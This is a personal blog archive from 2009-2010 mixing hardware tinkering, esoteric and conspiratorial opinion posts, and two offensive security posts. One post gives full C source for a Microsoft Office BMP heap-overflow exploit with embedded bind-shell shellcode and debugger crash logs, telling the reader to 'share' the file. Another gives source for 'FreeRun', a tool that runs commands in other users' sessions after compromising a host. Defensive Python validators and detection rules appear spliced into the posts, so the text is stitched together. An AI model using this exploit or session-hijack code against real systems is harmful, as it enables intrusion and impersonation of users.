The first step toward living is understanding its purpose.

Saturday, February 06, 2010
Unlocking The Core
Well, yesterday I bought an AMD Phenom X2 550 Black Edition CPU which is a 2 core chip. Funny thing is, it has 4 cores, 2 of which are disabled either due to fabrication issues or to meet the 2 core market demand. So with a bit of luck, I hoped to get an extra 2 cores for free and save myself £100 or so.

Entering the BIOS, I set NCC to Auto to enable the motherboard's core unlocking feature, but after a reboot, no joy, still only 2 cores. Damn. So I went back into the BIOS, installed the latest BIOS flash, and got the new Unleashing option. This time I set the NCC option manually to enable 4 cores and enabled Unleashing.

Again, after a reboot there were only 2 cores. So I went back again, and in the NCC option you could set a % value for each CPU (not sure what it actually means); each was at 2%, so I set cores 3 and 4 to 0% and left 1 and 2 at the 2% default. Another reboot and, to my delight, I saw the "4 Cores Enabled" message!

So I installed Windows and ran with 4 cores to give my new children a test, but the system was not that stable, so I went back to the NCC option and set the cores back to Auto. Reboot, and this time the 4 cores were still seen!! Joy!! I do not know why, as the first time I set it to Auto they were not seen, but hey, I won't complain :)

The system was still a bit unstable, so I changed the CPU's new cores from the default voltage to 1.400 to give a little more power to feed the 2 new babies. After doing that, no more crying; everything is working stably and I am happy with my free 2 core upgrade :)

The 800 speed in this picture is due to me running CnQ to save power during idle time. Alas, thank you AMD for this lovely chip! Once I buy some better cooling I will get this puppy overclocked, as apparently it will run happily at 3800, very nice indeed. Was a good Friday all round.
 
posted by c0ntex at 2:11 PM | Permalink | 1 comments
Wednesday, January 06, 2010
Old MSOffice Exploit
Here is the 0day exploit code I wrote to own Microsoft Office way back in April 2006, which I never seem to have published. Damn, don't 4 years go quick....

Anyhooo, there was a heap overflow in the rendering engine for .bmp headers in photoed.exe, winword.exe, excel.exe and powerpnt.exe which would allow an attacker to execute arbitrary, malicious code.

The vulnerability was in BMPIMP32.FLT. By modifying the value of an image header within a .bmp file, it was possible to trigger this bug and overflow a static buffer. This granted the attacker the ability to overwrite important information within the process, leading to malicious code execution.


// Example vulnerable section of a .bmp image file:
424D3600000000000000360000002800 BM6.......6...(.
000040060000B0040000010018000000 ..@.............
00000000000000000000000000000000 ................
000000000000A9AAA8A4A5A3A8A9A7B0 ................
B3B1B2B5B3AFB1B1AFB1B1B1B3B3A7AA ................
A8AEB1AFB1B4B2AEB1AFB0B3B1B8BBB9 ................
.. snip ..


// One with malicious input 'inserted' to trigger the bug:
424D3600000000000000360000002800 BM6.......6...(.
000040060000B0040000010008004141 ..@...........AA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
plus 10,000 more
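As an added, defensive counterpart to the two dumps above (this is not code from the original post), here is a small Python validator for the BMP headers that a parser should run before it allocates or copies anything sized by the file's own fields. The first two headers are reconstructed from the hex dumps, the third is a constructed variant of the second with a valid biCompression, and MAX_DIM is an assumed policy limit. The validator rejects the second dump on its biCompression field and the constructed variant on its colour-table count, the kind of 32-bit header field a renderer must never use as a copy length unchecked.

```python
import struct

# BITMAPFILEHEADER (14 bytes) and BITMAPINFOHEADER (40 bytes), little-endian.
BITMAPFILEHEADER = struct.Struct("<2sIHHI")       # bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
BITMAPINFOHEADER = struct.Struct("<IiiHHIIiiII")  # biSize, biWidth, biHeight, biPlanes, biBitCount,
                                                  # biCompression, biSizeImage, biX/YPelsPerMeter,
                                                  # biClrUsed, biClrImportant
BI_RGB, BI_RLE8, BI_RLE4, BI_BITFIELDS = 0, 1, 2, 3
MAX_DIM = 1 << 15          # assumed policy limit: no edge longer than 32768 pixels

# Reconstructed from the two hex dumps in the post (headers only, pixel data omitted).
BENIGN_HDR = bytes.fromhex(
    "424D3600000000000000360000002800"
    "000040060000B0040000010018000000"
    "00000000000000000000000000000000"
    "000000000000")
MALICIOUS_HDR = bytes.fromhex(
    "424D3600000000000000360000002800"
    "000040060000B0040000010008004141"
    "41414141414141414141414141414141"
    "41414141414141414141414141414141")
# Constructed variant: MALICIOUS_HDR with biCompression (offset 30..33) zeroed, so the
# colour-table check is the one that rejects it.
PALETTE_HDR = MALICIOUS_HDR[:30] + b"\x00\x00\x00\x00" + MALICIOUS_HDR[34:]


def parse_bmp_header(data):
    """Parse and validate the BMP headers; raise ValueError on the first failed check.
    Every size a renderer would allocate or copy is derived from bounded fields here
    rather than trusted from the file."""
    if len(data) < BITMAPFILEHEADER.size + BITMAPINFOHEADER.size:
        raise ValueError("truncated header")
    bf_type, _bf_size, _r1, _r2, bf_off = BITMAPFILEHEADER.unpack_from(data, 0)
    if bf_type != b"BM":
        raise ValueError("bad magic")
    (bi_size, width, height, planes, bpp, compression, _size_image,
     _xppm, _yppm, clr_used, _clr_important) = BITMAPINFOHEADER.unpack_from(
        data, BITMAPFILEHEADER.size)
    if bi_size != BITMAPINFOHEADER.size:
        raise ValueError("unsupported DIB header size %d" % bi_size)
    if planes != 1:
        raise ValueError("biPlanes must be 1, got %d" % planes)
    if bpp not in (1, 4, 8, 16, 24, 32):
        raise ValueError("unsupported biBitCount %d" % bpp)
    if compression not in (BI_RGB, BI_RLE8, BI_RLE4, BI_BITFIELDS):
        raise ValueError("unknown biCompression 0x%08x" % compression)
    if not (0 < width <= MAX_DIM) or not (0 < abs(height) <= MAX_DIM):
        raise ValueError("dimensions out of range: %dx%d" % (width, height))
    # Only indexed formats carry a colour table, and it can never hold more than
    # 2**bpp entries; biClrUsed is a 32-bit field and must be bounded before use.
    palette_entries = 0
    if bpp <= 8:
        palette_entries = clr_used if clr_used else (1 << bpp)
        if palette_entries > (1 << bpp):
            raise ValueError("biClrUsed %d exceeds %d entries for %d bpp"
                             % (clr_used, 1 << bpp, bpp))
    palette_bytes = palette_entries * 4
    expected_off = BITMAPFILEHEADER.size + bi_size + palette_bytes
    if bf_off < expected_off:
        raise ValueError("bfOffBits %d overlaps the headers (%d bytes)" % (bf_off, expected_off))
    row_bytes = ((width * bpp + 31) // 32) * 4     # rows are padded to 4-byte multiples
    return {"width": width, "height": height, "bpp": bpp, "compression": compression,
            "palette_bytes": palette_bytes, "row_bytes": row_bytes,
            "pixel_bytes": row_bytes * abs(height)}


def check_bmp(data):
    """(True, fields) for an acceptable header, (False, reason) otherwise."""
    try:
        return True, parse_bmp_header(data)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for name, hdr in (("benign", BENIGN_HDR), ("malicious", MALICIOUS_HDR),
                      ("palette", PALETTE_HDR)):
        print(name, check_bmp(hdr))
```

Run it and the benign header parses to a 1600x1200, 24-bpp image with 4800-byte rows, while the other two are refused before any allocation would happen.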


After photoed.exe opens the malicious .bmp file, we receive:


"The instruction at "0x77f581bd" referenced memory at "0x41414141". The memory could not be "written"."

(dc.cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00140000 ecx=41414141 edx=00196438 esi=00196438 edi=00000005
eip=77f581bd esp=0012fa3c ebp=0012fc60 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlAllocateHeap+0x60f:
77f581bd 8908 mov [eax],ecx ds:0023:41414141=????????


> 77f581bd 8908 mov [eax],ecx ds:0023:41414141=????????
> 77f581bf 894104 mov [ecx+0x4],eax


We have a classic heap overflow and can now overwrite _VECTORED_EXCEPTION_NODE, UnhandledExceptionFilter or RtlEnterCriticalSection, amongst other locations, which will return us to the malicious code and execute it for us. Another simple, useful option is to hijack the application's SE Handler directly, which allows us to gain control of the process in the same manner.

This same situation is present in Word, Excel and PowerPoint. If a user inserts the malicious image into any of these applications, the following situation is presented to us:


Word
----

0:000> gh
(e0c.fb8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000004 ecx=41414141 edx=029acbe0 esi=029acbe0 edi=00140000
eip=77f8452d esp=0012df98 ebp=0012e1b0 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlSizeHeap+0x1217:

77f8452d 8901 mov [ecx],eax ds:0023:41414141=????????
77f8452f 894804 mov [eax+0x4],ecx


Excel
-----

0:000> g
(870.728): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=0020b320 ecx=41414141 edx=77fc4860 esi=00210178 edi=00177048
eip=77f69d63 esp=00dafd88 ebp=00dafdc0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
ntdll!RtlDeleteCriticalSection+0x51:

77f69d63 8908 mov [eax],ecx ds:0023:41414141=????????
77f69d65 894104 mov [ecx+0x4],eax


PowerPoint
----------

0:000> gh
(8ec.404): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00150141 ebx=00150000 ecx=41414141 edx=41414141 esi=00196740 edi=00000004
eip=77f57ec4 esp=0013a628 ebp=0013a84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
ntdll!RtlAllocateHeap+0x316:

77f57ec4 890a mov [edx],ecx ds:0023:41414141=????????
77f57ec6 895104 mov [ecx+0x4],edx

/* The shady codez */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER 10000

unsigned char bmphdr[]={ 0x42,0x4d,0x36,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x36,0x00,0x00,0x00,0x28,0x00,0x00,0x00,
0x40,0x06,0x00,0x00,0xb0,0x04,0x00,0x00,0x01,
0x00,0x08,0x00};

unsigned char shell[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";


int main(int argc, char **argv)
{
    char malware[BUFFER];
    FILE *ebulfile;

    puts("\nPOC exploit for Heap overflow in Photo Editor, Word, Excel and PowerPoint!");
    puts("Bug discovered by c0ntex - c0ntexb@gmail.com - http://www.open-security.org\n");

    if(argc != 2) {
        puts("Usage: bmpb00m bmpb00m.bmp\n");
        exit(EXIT_FAILURE);
    }

    if(strlen(argv[1]) > 20) {
        puts("Sorry, file is too long!");
        exit(EXIT_FAILURE);
    }

    ebulfile = fopen(argv[1], "w");
    if(!ebulfile) {
        perror("Could not create file!");
        return EXIT_FAILURE;
    }
    sleep(2);

    fprintf(stderr, "Created the file [%s], now share it ;-) \n", argv[1]);

    memset(malware, '\x41', BUFFER);
    memcpy(malware, bmphdr, sizeof(bmphdr));
    memcpy(&malware[200], shell, sizeof(shell));

    // Addresses get messed up so we use some funk to get the alignment right

    *(long *)&malware[1085] = 0x54909090; // Grab the 54 from here, and the 0012fc from
    *(long *)&malware[1089] = 0x0012fc90; // here, ECX -> ntdll.77f51c78 -> 0x0012fc54

    *(long *)&malware[1093] = 0x12345690; // Grab the 195048 from here and then we use
    *(long *)&malware[1097] = 0x90900090; // the 00 from here to make EAX -> 0x00195048

    fwrite(malware, sizeof(malware), 1, ebulfile);

    fclose(ebulfile);

    return EXIT_SUCCESS;
}


 
posted by c0ntex at 11:55 AM | Permalink | 0 comments
Saturday, December 26, 2009
The Rosicrucian Initiation
This is an interesting video about the initiation methods and beginning stages within Rosicrucianism and the related orders' teachings. There are some parts within the video that seem a bit far-fetched, namely with regard to the sacred geometry discussions of the image of the tree of life; however, the majority of the video is pretty interesting and follows commonly accepted esoteric teaching. Enjoy :)


 
posted by c0ntex at 2:45 PM | Permalink | 0 comments
Friday, December 04, 2009
FreeRunning
This tool will enable you to run commands in another user's Terminal Server session on a server where multiple people are logged in. Run this tool from a SYSTEM shell via AT (due to limitations of WTSQueryUserToken()); you then select the session to run the process in, and it will execute the process in that user's session as that user.

This means that when you own a box and gain either Administrator or System access, you can execute commands in other users' sessions, such as under a Domain User account!! :)

The following is an example of this: running freerun from a compromised Local Administrator account and executing calc.exe in a Domain User's session as that user, without knowing their password :) Below is a before and after of Task Manager.



Tested and working on Windows XP, 2K3 Server and 2K8 Server.

C:\>freerun.exe

** FreeRun - A Passwordless RunAs Tool **
*****************************************

Found User -> [Administrator]
Found Window -> [Console]
Found Session -> [1]

Found User -> [user]
Found Window -> [RDP-Tcp#0]
Found Session -> [2]

Enter Session ID to freerun: 2
Enter command to execute: c:\windows\system32\calc.exe
FreeRunning in the user's session, wait...

C:\>


The tool can be downloaded from http://nodefense.org/freerun.exe
The source can be downloaded from http://nodefense.org/freerun.c
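From the defender's side, the token switch this tool performs shows up in process-creation auditing: Security event 4688 records the creator's Subject and, when the new process runs under a different token, a Target Subject. The following is an added Python example (not part of the post or of freerun) that flags 4688 records where a SYSTEM-context creator other than an expected logon broker starts a process under another user's token. It assumes the Target Subject fields, which 4688 carries on Windows 8.1 / Server 2012 R2 and later (the XP/2003/2008 hosts the tool was tested on would not log them), the broker allowlist is a starting point to tune per environment, and all records are constructed.

```python
import ntpath

# Well-known SIDs of the service accounts: SYSTEM, LOCAL SERVICE, NETWORK SERVICE.
SERVICE_SIDS = {"S-1-5-18", "S-1-5-19", "S-1-5-20"}
SYSTEM_LOGON_ID = "0x3e7"   # the LocalSystem logon session

# Creator processes that legitimately start user-token processes from SYSTEM
# (assumption: a starting allowlist, to be tuned per environment).
EXPECTED_BROKERS = {"winlogon.exe", "userinit.exe", "services.exe", "svchost.exe"}

# Constructed 4688 records, reduced to the fields the rule needs. The SIDs ending in
# -1105 and the logon ids are made up.
EVENTS = [
    {   # freerun from an AT-scheduled SYSTEM shell creating calc.exe under user's token
        "EventID": 4688, "SubjectUserSid": "S-1-5-18", "SubjectUserName": "HOST$",
        "SubjectLogonId": "0x3e7",
        "TargetUserSid": "S-1-5-21-1111-2222-3333-1105", "TargetUserName": "user",
        "TargetLogonId": "0x5a2c1",
        "NewProcessName": r"C:\Windows\System32\calc.exe",
        "CreatorProcessName": r"C:\Users\Administrator\Desktop\freerun.exe"},
    {   # normal interactive logon: winlogon starts userinit.exe with the user's token
        "EventID": 4688, "SubjectUserSid": "S-1-5-18", "SubjectUserName": "HOST$",
        "SubjectLogonId": "0x3e7",
        "TargetUserSid": "S-1-5-21-1111-2222-3333-1105", "TargetUserName": "user",
        "TargetLogonId": "0x5a2c1",
        "NewProcessName": r"C:\Windows\System32\userinit.exe",
        "CreatorProcessName": r"C:\Windows\System32\winlogon.exe"},
    {   # same-user process creation: no Target Subject ("-")
        "EventID": 4688, "SubjectUserSid": "S-1-5-21-1111-2222-3333-1105",
        "SubjectUserName": "user", "SubjectLogonId": "0x5a2c1",
        "TargetUserSid": "S-1-0-0", "TargetUserName": "-", "TargetLogonId": "0x0",
        "NewProcessName": r"C:\Windows\System32\notepad.exe",
        "CreatorProcessName": r"C:\Windows\explorer.exe"},
    {   # the service control manager starting a service as NETWORK SERVICE
        "EventID": 4688, "SubjectUserSid": "S-1-5-18", "SubjectUserName": "HOST$",
        "SubjectLogonId": "0x3e7",
        "TargetUserSid": "S-1-5-20", "TargetUserName": "NETWORK SERVICE",
        "TargetLogonId": "0x3e4",
        "NewProcessName": r"C:\Windows\System32\svchost.exe",
        "CreatorProcessName": r"C:\Windows\System32\services.exe"},
]


def is_system_context(ev):
    """The creator ran as LocalSystem (by SID or by the 0x3e7 logon session)."""
    return (ev.get("SubjectUserSid") == "S-1-5-18"
            or ev.get("SubjectLogonId", "").lower() == SYSTEM_LOGON_ID)


def is_cross_user_launch(ev):
    """True when a SYSTEM-context creator starts a process under another, non-service
    user's token and the creator is not one of the expected logon brokers."""
    if ev.get("EventID") != 4688 or not is_system_context(ev):
        return False
    target_sid = ev.get("TargetUserSid", "")
    if ev.get("TargetUserName", "-") == "-" or not target_sid.startswith("S-1-5-21-"):
        return False                   # no token switch, or a service account target
    if target_sid in SERVICE_SIDS:
        return False
    creator = ntpath.basename(ev.get("CreatorProcessName", "")).lower()
    return creator not in EXPECTED_BROKERS


def find_cross_user_launches(events):
    """(creator, new process, target user) for every record the rule flags."""
    return [(ev["CreatorProcessName"], ev["NewProcessName"], ev["TargetUserName"])
            for ev in events if is_cross_user_launch(ev)]


if __name__ == "__main__":
    for hit in find_cross_user_launches(EVENTS):
        print("cross-user launch:", hit)
```

Matching on the S-1-5-18 SID or the 0x3e7 logon id rather than on the account name matters because a SYSTEM-context 4688 shows the computer account (HOST$) as the Subject account name, not the word SYSTEM.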


/*
 * Freerun - Passwordless RunAs
 * Written by c0ntex - Dec 2009
 */
/* The include names were eaten by blogspot; these are the headers the calls below
   need. The code passes TCHAR buffers to the W versions of the APIs, so it was
   built as a UNICODE project, which is made explicit here. */
#ifndef UNICODE
#define UNICODE
#endif
#ifndef _UNICODE
#define _UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ntsecapi.h>
#pragma comment(lib, "Secur32.lib")
#include <wtsapi32.h>
#pragma comment(lib, "WtsApi32.lib")

#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif

BOOL check;


void ExecUserProc(HANDLE finalDUPToken, char * command)
{
    wchar_t cmdname[40];
    PROCESS_INFORMATION pi;
    STARTUPINFOW si;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);          /* required by CreateProcess*; the original left it 0 */

    mbstowcs(cmdname, command, 39);
    cmdname[39] = L'\0';

    /* Start the command with the token of the chosen session */
    if(!CreateProcessAsUserW(
        finalDUPToken,
        cmdname,
        cmdname,
        NULL,
        NULL,
        FALSE,
        0,
        0,
        NULL,
        &si,
        &pi)) {
        wprintf(L"CPAU Error: %lu\n\n", GetLastError());
        return;
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}


void EnumWTSUsers(void)
{
    DWORD i = 0;
    DWORD DWUserLen = 0;
    DWORD DWSessNum = 0;
    ULONG lcount;
    PLUID lusers;
    NTSTATUS enumstatus;
    LPWSTR wtsUserAcct = NULL;
    PWTS_SESSION_INFOW pSessInfo = NULL;

    check = WTSEnumerateSessionsW(
        WTS_CURRENT_SERVER_HANDLE,
        0,
        1,
        &pSessInfo,
        &DWSessNum);
    if(!check) {
        /* GetLastError() is a DWORD; the original printed it with %s */
        printf("WTSEnumerateSessions error: %lu\n", GetLastError());
        _exit(1);
    }

    enumstatus = LsaEnumerateLogonSessions(
        &lcount,
        &lusers);
    if(enumstatus != STATUS_SUCCESS) {
        wprintf(L"LsaEnumerateLogonSessions error: 0x%08lx (Win32 error %lu)\n",
                (long)enumstatus, LsaNtStatusToWinError(enumstatus));
        _exit(1);
    }

    LsaFreeReturnBuffer(lusers);

    for(i = 0; i < DWSessNum; i++) {
        /* blogspot mangled the original loop header and session lookup; the
           active-session test and the WTSQuerySessionInformationW call are
           reconstructed from the variables declared above. */
        if(pSessInfo[i].State == WTSActive &&
           WTSQuerySessionInformationW(
               WTS_CURRENT_SERVER_HANDLE,
               pSessInfo[i].SessionId,
               WTSUserName,
               &wtsUserAcct,
               &DWUserLen)) {
            wprintf(L"Found User -> [%s]\nFound Window -> [%s]\nFound Session -> [%lu]\n\n",
                    wtsUserAcct,
                    pSessInfo[i].pWinStationName,
                    pSessInfo[i].SessionId);
            WTSFreeMemory(wtsUserAcct);
            wtsUserAcct = NULL;

            Sleep(1000);
        }
    }
    WTSFreeMemory(pSessInfo);
}


HANDLE getWTSHandle(DWORD i)
{
    HANDLE wtsHandle = NULL;

    /* Needs a LocalSystem caller, hence the SYSTEM shell started via AT */
    if(!WTSQueryUserToken(
        i,
        &wtsHandle)) {
        wprintf(L"\n\nOps: WTSQueryUserToken error: %lu\nMaybe you used the wrong sessionID value...\n", GetLastError());
        exit(1);
    }

    return wtsHandle;
}


void useWTSSession(HANDLE finalDUPToken, char * command)
{
    ExecUserProc(finalDUPToken, command);
    CloseHandle(finalDUPToken);
}


BOOL GetUser(void)
{
    WCHAR uName[256] = {0};
    DWORD unSize = sizeof(uName) / sizeof(uName[0]);   /* size in characters, not bytes */

    if(!GetUserNameW(
        uName,
        &unSize)) {
        printf("GetUserNameW error: %lu\n", GetLastError());
        return FALSE;
    }
    if(!wcsstr(uName, L"SYSTEM")) {
        return FALSE;
    }
    return TRUE;
}


int main(int argc, char * argv[])
{
    char session[4] = {0};
    char command[40] = {0};
    char * stripper = NULL;
    HANDLE wtsDupToken = NULL;

    printf("\n** FreeRun - A Passwordless RunAs Tool **\n");
    printf("*****************************************\n\n");

    EnumWTSUsers();

    check = GetUser();
    if(check == FALSE) {
        printf("Sorry, you must run this tool with SYSTEM rights!\n\n");
        exit(1);
    }

    printf("Enter Session ID to freerun: ");
    if(fgets(
        session,
        sizeof(session),
        stdin) != NULL) {
        if((strlen(session) -1 > 1)) {
            printf("Invalid session number, try again!\n");
            exit(1);
        }
        stripper = strchr(
            session,          /* the original searched command here, the wrong buffer */
            '\n');
        if(stripper != NULL) {
            *stripper = '\0';
        }
    }
    session[3] = '\0';

    stripper = NULL;

    printf("Enter command to execute: ");
    if(fgets(
        command,
        sizeof(command),
        stdin) != NULL) {
        if(strlen(command) -1 > 39) {
            printf("Invalid command name, try again!\n");
            exit(1);
        }
        stripper = strchr(
            command,
            '\n');
        if(stripper != NULL) {
            *stripper = '\0';
        }
    }
    command[39] = '\0';

    Sleep(1000);
    printf("FreeRunning in the user's session, wait...\n");

    wtsDupToken = getWTSHandle((DWORD)atoi(session));
    if(!wtsDupToken) {
        printf("Something has gone wrong getting the handle...\n");
        exit(1);
    }

    /* useWTSSession closes the token; the original closed it a second time here */
    useWTSSession(
        wtsDupToken,
        command);

    return 0;
}


 
posted by c0ntex at 4:25 PM | Permalink | 1 comments
Friday, November 13, 2009
The heart
Nice nasheed :)


 
posted by c0ntex at 10:15 PM | Permalink | 0 comments
Thursday, July 16, 2009
President of America, President of Europe...
and if the news is right, it could be that champion for truth, human rights, fairness, removal of oppression and activist against injustice, Mr Tony "yes man" Blair?

The man who is, or should I say was (apparently old dogs can learn new tricks), all for illegal wars, the murdering of millions of innocent people and, let's not forget, the murdering of fellow British citizens to back old alliances, including the British monarchy, to help expand the 'global' British imperial empire, could potentially be the president of not just the UK, but of the entire European region.

Obviously this is a move to centralise European power behind one man, or should I say, one puppet, just like they did with Obama in the US of A.

Now we have 2 puppets who are going to be seen as the rulers of pretty much half the planet, or at least they will be the face and voice for that power.

I really like this image on the left, it shows the clear picture of what is going on. If you can't see it yourself, let me help you. The hand of the cardinal is completely up Tony's bottom helping to make his lips and eyes move. Hence the reason why the royal red cloak is tightly wrapped around the 'Prime-Minister-to-be's' posterior.



Again, that elusive right arm of the cardinal is missing, I wonder if it is making the smile happen or just erecting the finger.

"Tony Blair won the formal backing of Gordon Brown yesterday as Britain's candidate to become the first "President of Europe"."

You can read the full story here


 
posted by c0ntex at 3:34 PM | Permalink | 0 comments
The sad state of the youth
This is an old post that got removed somehow - Added back.

Remember the days when life was simple and things didn't matter. Now, as each second ticks by, the societies we occupy seem to overflow that little bit more with a needless desire to embrace the foul cesspits that material life has to offer. Our grooming and desensitization from the negative trinkets of the world is unparalleled; some say that history repeats itself, and this is for sure a certainty.

We are now back to the Babylonian days where the most undesirable things became the overwhelming desire of the populace. 100 years ago, nudity, drunkenness, lewdness and the like were frowned upon, yet here we are today. Now further advanced in our technological innovations, man seems to have advanced so far yet, for some oxymoronic reason, regressed even further, and with our freshly acquired ego and knowledge, we are suffering from an acute deterioration of goodness.

The state of our children is simply a reflection of the adults and the society they develop and grow in. A child is a blank canvas and only develops and grows according to the inputs it receives from its surroundings; this is a simple sociological fact. So we ask why the children want to do drugs, drink booze, have promiscuous sex, and all these things? It is quite simple: their education, their friends, their examples and their society are all biased toward these things.

Then is it any surprise that in 2007 in the mighty US of A, over 90,427 reported rapes occurred and more than 1,408,337 violent crimes took place? These are staggering numbers for the most 'free and advanced' nation in the world. These numbers, by the way, are taken from http://www.fbi.gov and not made up :)

If you watch the TV, read a newspaper or even walk down the street today you are bombarded with images of half-nude women advertising coca-cola, men and women dressed as if they are auditioning for a porn movie, reality TV shows where misguided celebrities (who are the role models for our youth) talk about their sordid sexual relations, drink and drug binges and the likes, it is of little surprise when your little Tommy comes home stoned and Tabatha comes home pregnant.

Children simply mimic the peers they have, and when the society as a whole is obsessed with football, drinking and drugs, partying and 'living it up', what else can we expect to happen to them? They will simply do the same. The ironic fact is that the majority of people don't really care about this problem until it hits home, and when it does they blame the junkies, the prostitutes and the government's lack of involvement for their child's impoverished state. The reality is, however, that it is none of these things that have caused the problem; it is simply a case of misguided education.

An example of this is many of the young guys I know. I asked some of them if sleeping around with girls was something that should be abandoned and replaced with a 'marriage first' institution like in Islam and Christianity, etc. The overwhelming response was 'um, no'; sleeping around was fun and cool and religion had no practical implementation.

I then asked the same people what they would think if their daughter was the target of guys thinking how you were today, seeing her as a piece of meat to sleep with for one night and then forget about. The honest ones were outraged at this suggestion and for some reason stated that sleeping around was no longer ok in this situation.... Double standards?

It is weird how things change when, as I said, it comes home.

Education starts with and ends with the parents, and if they are misguided then I ask what hope is there?


"Children as young as 12 are being treated in a new specialist addiction unit set up to deal with those hooked on alcohol and drugs.

The Priory hospital, which is famous for its celebrity patients, set up the unit to meet what it says is mounting demand from worried parents. The unit, based at its acute psychiatric hospital in north London, will deal with drug and alcohol problems, eating disorders and behavioural issues such as an obsession with the internet or computer games."

http://news.independent.co.uk/uk/health_medical/article2578491.ece


 
posted by c0ntex at 1:05 PM | Permalink | 0 comments
Forbidden fruit....
This is an old post that got deleted somehow - Added back.

...the forbidden knowledge?

"All truth passes through three stages. First, it is ridiculed, second it is violently opposed, and third, it is accepted as self-evident." - Arthur Schopenhauer

A pretty cool site, enjoy!


http://www.theforbiddenknowledge.com


"In 1990 I started studying UFOs. I came home from work one evening, turned on the Television like most other people do and airing on the FOX Network was a show called, "Sightings". It was a show dedicated to the unexplained. It often showed UFO footage from around the world. The footage they were playing that night was very convincing to me so I decided to look into the subject further. As time went by I expanded my research to the Bible and ancient civilizations. I had no idea where this research would lead me.

A couple years went by and in those I managed to collect an impressive store of UFO video footage from television. I would listen to UFO "experts" such as Stanton Freedman talk about the U.S. Governments involvement in the secrecy of UFOs. As time went on I realized that individuals like Stanton were part of an evil scheme. I listened to Art Bell late at night every night gathering as much information as I could. But even with Art Bell I grew suspicious.

A friend of mine gave me a copy of Bramley's book and I began to read it. As my level of awareness rose I realized secret societies and how they worked. As time went on it all became much clearer to me. I also realized that people are not always what they seem.

When my level of awareness rose to a certain point I had to write about it. I'm not the type of person to sit on something so awesome. I had to tell others of the things I was realizing. In learning you will teach, and in teaching you will learn. So I am doing just that.

Bramley mentions the conflict in the Bible between "God" and the Serpent. "God" was trying to keep a certain type of knowledge away from Mankind and the Serpent was trying to teach Mankind that knowledge. The victor of that conflict would be the ones (yes plural!) who controlled earth.

In Eden the members of "God" made it a sin to eat of the fruit. The fruit is an apple and it is symbolic for a certain kind of knowledge. To help keep Man away from that knowledge they taught that if Man learned it he would die.

Asking the question, "Why should learning knowledge be a sin?" (the original sin) and comparing it to modern day observations ought to wake you up to the fact that you live within societal system that was engineered by the members of "God" to empower themselves while keeping those who live within it ignorant. Do you want to test this theory?

